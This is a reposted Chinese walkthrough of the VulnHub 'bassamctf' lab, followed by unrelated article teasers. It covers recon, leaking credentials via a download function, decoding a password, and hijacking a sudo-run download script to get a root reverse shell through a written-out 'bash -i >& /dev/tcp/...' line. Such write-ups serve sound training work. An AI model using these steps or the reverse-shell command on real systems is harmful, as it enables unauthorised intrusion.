vulnhub靶场之bassamctf

news2024/11/16 17:51:48

1.信息收集

探测存活主机,输入:netdiscover -r 192.168.239.0/24 ,发现192.168.239.177存活。
在这里插入图片描述
对目标主机192.168.239.176进行端口扫描,发现存活22(SSH)、80端口。
在这里插入图片描述
在浏览器上输入:http://192.168.239.177,查看源码,发现类似于网站的域名。
在这里插入图片描述
在这里插入图片描述
在/etc/hosts文件里面添加ip与对应的域名,浏览器访问域名,访问成果。
在这里插入图片描述
在这里插入图片描述
进行目录扫描,未发现可疑信息。
在这里插入图片描述
进行域名扫描,发现welcome.bassam.ctf,加入/etc/hosts中,访问http://welcome.bassam.ctf。
在这里插入图片描述
对http://welcome.bassam.ctf进行目录扫描,发现index.php与config.php。
在这里插入图片描述
访问index.php发现存在下载的功能。
在这里插入图片描述

2.漏洞利用

在url中输入:http://welcome.bassam.ctf/config.php,无反应;输入config.php下载成功,发现用户test:test123。
在这里插入图片描述
尝试ssh登录成功。在这里插入图片描述

3.提权

在/home/kira中发现可执行文件test.sh,使用cat查看内容。
在这里插入图片描述
查看根目录,发现存在/PassProgram/文件夹,进入文件夹中,发现存在解码和编码。
在这里插入图片描述
查看/var/www/ctf,存在MySecretPassword可疑文件。
在这里插入图片描述
查看MySecretPassword文件类型为text,但无法查看。使用hexdump查看文件。猜测是用/PassProgram目录下的encoder加密的。
在这里插入图片描述
使用decoder解密,可得kira用户的密码为:kira2003。切换到kira用户。
在这里插入图片描述
输入sudo -l发现存在sudo提权。
在这里插入图片描述
切换到bassam用户。
在这里插入图片描述
查看bassam目录下存在down.sh文件,查看内容为下载script.sh文件。
在这里插入图片描述
将mywebsite.test域名添加到本机的hosts文件中
在这里插入图片描述
创建script.sh文件,在里面输入bash -i >& /dev/tcp/192.168.239.131/8888 0>&1,使用PHP开启web服务php -S 0:80
在这里插入图片描述
开启本地监听,在另一个shell中输入sudo ./down.sh,反弹shell成功。
在这里插入图片描述
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/563960.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

网络协议 | 典型协议、B/S模式、C/S模式

欢迎关注博主 Mindtechnist 或加入【Linux C/C/Python社区】一起学习和分享Linux、C、C、Python、Matlab,机器人运动控制、多机器人协作,智能优化算法,滤波估计、多传感器信息融合,机器学习,人工智能等相关领域的知识和…

LeetCode:29. 两数相除

29. 两数相除 1)题目2)思路3)代码1.初始代码2.第一次优化3.第二次优化 4)结果1.初始结果2.第一次优化结果3.第二次优化结果 1)题目 给你两个整数,被除数 dividend 和除数 divisor。将两数相除,…

es 三 安装 es 安装kibana

目录 安装7.3.0 版本 下载地址 一个比一个快 页面测试访问 安装kibana 下载 Config/kibana.yml 配置修改开启中文 页面访问 安装7.3.0 版本 下载地址 一个比一个快 Index of /elasticsearch/ 下载中心 - Elastic 中文社区 下载中心 - Elastic 中文社区 官网下载 开箱…

CANape使用记录(一):CANape新建工程及标定观测

目录 1、概述 2、新建工程 3、添加观测与标定量 1、概述 CANape具有以下主要组件:在线测量,离线分析,诊断,打印机功能,数据管理,闪存编程,校准,CDM Studio和设备数据库编辑器&…

从工地到办公室:一个土木工程师如何学成测试技能?

提桶跑路成功了,这工地我是再也不来了。 ​ 工作中流的汗真的都是报专业时脑袋里进的水。 当时高考完,对于要学什么专业感到很迷茫,因为姨夫是干工地的,零几年土木专业的大学生,在我们这五线城市一个月也能够拿一万多…

汇聚支付APP+技术方案介绍

一、时序图 商户使用汇聚支付的 APP方案,需要两个步骤: 步骤一: 请求汇聚支付的支付接口,https://www.joinpay.com/trade/uniPayApi.action 获取返回的关键参数 rc_Result。 步骤二: 商户 APP 按照微信的 SDK 规范使…

pdf怎么拆分成一页一页的?办公常备工具说明

PDF(Portable Document Format)是一种用于创建和共享文档的文件格式。它由Adobe Systems开发,并已成为电子文档的通用格式。PDF文件可以包含文本、图像、表格、超链接和其他多媒体内容,使其成为一种非常方便的文件格式。 然而&…

ChatGPT国内免费使用的网站

ChatGPT是什么意思? ChatGPT全称:Chat Generative Pre-trained Transformer 在英文中“chat”是聊天的意思,GPT是一种预训练语言模型的缩写。 所以ChatGPT是一款功能非常强大的AI(人工智能)聊天机器人,能…

linux小技巧-如何修改IP(四种方法)

目录 项目场景: 方法分析及步骤介绍 原因分析: 解决方案: 项目场景: 项目上经常遇到修改IP的情况,这里总结一些各个情况下修改IP的方法,尤其时有时候没有主机屏幕显示,借助于命令行的方式修…

MATMacOS安装

MAT MacOS安装 文章目录 MAT MacOS安装第一章 简述第01节 介绍第02节 获取 第二章 配置第01节 显示包内容第02节 MAT配置Java环境变量第03节 MAT兼容低版本Java 第三章 问题第01节 正常启动效果第02节 可能遇到的问题 第一章 简述 第01节 介绍 什么是 MAT 工具? …

【随时更新】知识点回顾

哈夫曼编码和解码 C 哈夫曼编码 【介绍编码过程】 哈夫曼树编码及其图形化的实现 【使用可视化方式展现最终编码效果】 Python中使用哈夫曼算法实现文件的压缩与解压缩 【Python实现】 哈夫曼树 C语言实现 【图解如何生成】 编码过程 1. 使用二进制流,统计当前文件…

如何利用Smartbi电子表格进行财务常用账簿数据的联动查询

财务,是几乎所有企事业单位内部的核心组织。单位今年耗费几何,企业去年赚多少钱,平均成本在什么水平,为国家创造多少税收等等,所有这些信息,最终都通过财务账表的方式来体现。可以说,大家工作辛…

OSI/RM七层网络模型和网络协议

目录 1.OSI/RM七层网络模型1.1 结构图1.2 各层功能 2.OSI七层、TCP/IP四层、五层网络模型对比3.各层对应网络协议3.1 应用层3.2 传输层 1.OSI/RM七层网络模型 OSI/RM(Open System Interconnection/Reference Model,开放式系统互联参考模型)是…

前端到接口层的反序列化流程

前置知识 参考我的另一篇博客,(209条消息) Servlet和SpringMVC_fengwuJ的博客-CSDN博客,描述了Servlet与SpringMVC的关系,大致可以知道从前端请求,到后端接口的中间过程 反序列化流程 前篇文章中,走到 getMethodPara…

平台总线模型简介

1. 平台总线介绍 平台总线模型将一个驱动分成两部分 device.c, driver.c。一个描述硬件, 一个控制硬件。 平台总线通过比较字符串, 将name相同的device.c和driver.c匹配到一起来控制硬件。 driver通过平台总线去拿到device.c内容。 平台总线的优点是减少重复代码 提高效率。 …

中间件(三)- Kafka(一)

Kafka 1. Kafka简介1.1 名字由来1.2 主要特性1.3 相关术语1.4 架构图1.5 消息队列1.6 Kafka消费模式1. 一对一消费模式2. 一对多消费模式 1.7 消息中间件 2. Kafka安装及使用2.1 下载kafka2.2 修改配置文件2.3 启动2.4 docker启动 3. 简单指令3.1 topic相关3.2 Kafka 生产/消费…

`JOB`的正确打开方式

文章目录 JOB的正确打开方式 简介工作原理使用场景使用方式注意事项启动JOB失败的情况JOB正确打开方式错误方式正确方式进阶方式终极方式 总结 JOB的正确打开方式 最近有一些小伙伴在使用JOB时,由于使用不当,引起一些问题。例如把license占满&#xff0c…

ASEMI代理长电可控硅MCR100-8特征,MCR100-8应用

编辑-Z 长电可控硅MCR100-8参数: 型号:MCR100-8 VDRM/VRRM:600V IT(RMS):0.8A 结点温度Tj:-40~125℃ 储存温度Tstg:-55 ~ 150℃ 通态电压VTM:1.7V 栅极触发电压VGT:0.8V 正…

泰克MDO4104C(Tektronix) mdo4104c混合域示波器

泰克 MDO4104C混合域示波器,1 GHz,4 通道,2.5 - 5 GS/s,20 M 点 ​泰克 MDO4104C 示波器是一款 6 合 1 集成示波器,可以配置可选的频谱分析仪、任意波形/函数发生器、逻辑分析仪、协议分析仪和 DVM/频率计数器。当配置…

黑盒测试能发现以下几类错误

黑盒测试能发现以下几类错误 黑盒测试是指在不考虑被测试软件的内部结构和工作原理的情况下,通过输入输出的方式对被测试软件进行测试。它主要关注被测试软件的功能是否达到预期的要求。黑盒测试能够发现以下几类错误。 1. 输入错误:黑盒测试可以检查被测…